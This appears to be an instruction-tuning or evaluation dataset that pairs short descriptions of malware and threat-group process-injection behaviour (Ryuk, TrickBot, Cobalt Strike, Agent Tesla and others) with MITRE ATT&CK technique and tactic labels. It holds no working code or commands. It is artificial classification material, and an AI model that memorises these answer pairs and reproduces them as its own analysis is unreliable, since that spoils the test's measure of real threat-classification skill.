+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos has a command to hide itself through injecting into another process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA can inject into running processes on a compromised host.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has injected an install module into a newly created process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can inject code into local and remote processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader injects into the Internet Explorer process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has used Nt* Native API functions to inject code into legitimate processes such as wermgr.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can inject decrypted shellcode into the LanmanServer service.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wiarp creates a backdoor through which remote attackers can inject files into running processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird performs multiple process injections to hijack system processes and execute malicious code.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can inject code into a targeted process by writing to the remote memory of an infected system and then create a remote thread.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT can inject malicious code into process created by the “Command_Create&Inject” function.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can inject the loader file, Speech02.db, into a process.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Lazarus Group malware sample performs reflective DLL injection.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has injected Mispadu’s DLL into a process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An executable dropped onto victims by Putter Panda aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe).","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has been seen injecting a DLL into winword.exe.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH has the ability to execute a malicious DLL by injecting into `explorer.exe` on a compromised machine.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy injects its DLL component into svchost.exe.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp's bootkit can inject a malicious DLL into the address space of running processes.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon has a command to inject code into a process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike has the ability to load DLLs via reflective injection.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has injected its orchestrator DLL into explorer.exe. ComRAT has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti has loaded an encrypted DLL into memory and then executes it.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can use a .NET-based DLL named `RunPe6` for process injection.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi injects itself into the secure shell (SSH) process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre injects into other processes to load modules.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise injects DLL files into iexplore.exe.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary injects its DLL file into a newly spawned Internet Explorer process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed injecting in to Explorer.exe and other processes.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher injects itself into various processes depending on whether it is low integrity or high integrity.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The FunnyDream FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to inject DLLs into specific processes.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Get2 has the ability to inject DLLs into processes.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HIDEDRV injects a DLL for Downdelph into the explorer.exe process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can inject a DLL into rundll32.exe for execution.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector has the ability to inject a DLL into running processes, including the IronNetInjector DLL into explorer.exe.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can perform process injection by using a reflective DLL.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has used the PowerKatz plugin that can be loaded into the address space of a PowerShell process through reflective DLL loading.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has injected the malware DLL into a target process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex loads injecthelper.dll into a newly created rundll32.exe process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can inject a DLL into `rundll32.exe` for execution.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PS1 can inject its payload DLL Into memory.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can inject its modules into various processes using reflective DLL loading.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy can inject a malicious DLL into a process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can migrate into another process using reflective DLL injection.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA performs a reflective DLL injection using a given pid.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can use ImprovedReflectiveDLLInjection to deploy components.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can perform DLL injection.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has injected its DLL component into `EhStorAurhn.exe`.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has injected a DLL into svchost.exe.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Socksbot creates a suspended svchost process and injects its DLL into it.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can execute loadfromfile, loadfromstorage, and loadfrommem to inject a DLL from disk, storage, or memory respectively.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.","Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can perform DLL loading.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to inject DLLs for malicious plugins into running processes.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use DLL injection to load embedded files and modules.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell is injected into a shared SVCHOST process.,"Tecnique: T1055.001 Process Injection: Dynamic-link Library Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.","Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke's miner, ""TermsHost.exe"", evaded defenses by injecting itself into Windows processes, including Notepad.exe.","Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak downloads an executable and injects it directly into a new process.,"Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy has a module to inject a PE binary into a remote process.,"Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can inject its backdoor as a portable executable into a target process.,"Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can execute PE files in the address space of the specified process.,"Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process.","Tecnique: T1055.002 Process Injection: Portable Executable Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.,"Tecnique: T1055.003 Process Injection: Thread Execution Hijacking, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the ResumeThread API.,"Tecnique: T1055.003 Process Injection: Thread Execution Hijacking, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can use thread injection to inject shellcode into the process of security software.,"Tecnique: T1055.003 Process Injection: Thread Execution Hijacking, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has injected malicious code into a new svchost.exe process.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor performs the injection by attaching its code into the APC queue using NtQueueApcThread API.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can inject itself into a new `svchost.exe -k netsvcs` process using the asynchronous procedure call (APC) queue.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use asynchronous procedure call (APC) injection to execute commands received from C2.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has used ZwQueueApcThread to inject itself into remote processes.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can inject its code into a trusted process via the APC queue.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can use the `QueueUserAPC` API to execute shellcode on a compromised machine.,"Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TURNEDUP is capable of injecting code into the APC queue of a created Rundll32 process as part of an ""Early Bird injection.""","Tecnique: T1055.004 Process Injection: Asynchronous Procedure Call, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has injected code into target processes via thread local storage callbacks.,"Tecnique: T1055.005 Process Injection: Thread Local Storage, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PACEMAKER can use PTRACE to attach to a targeted process to read process memory.,"Tecnique: T1055.008 Process Injection: Ptrace System Calls, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.,"Tecnique: T1055.011 Process Injection: Extra Window Memory Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Power Loader overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.,"Tecnique: T1055.011 Process Injection: Extra Window Memory Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can use process hollowing to inject one of its trojans into another process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Patchwork payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used process hollowing to execute CyberGate malware.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Threat Group-3390 tool can spawn `svchost.exe` and inject the payload into that process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used process hollowing in iexplore.exe to load the RedLeaves implant.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.","Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS has a command to download an .exe and use process hollowing to inject it into a new process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing.","Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
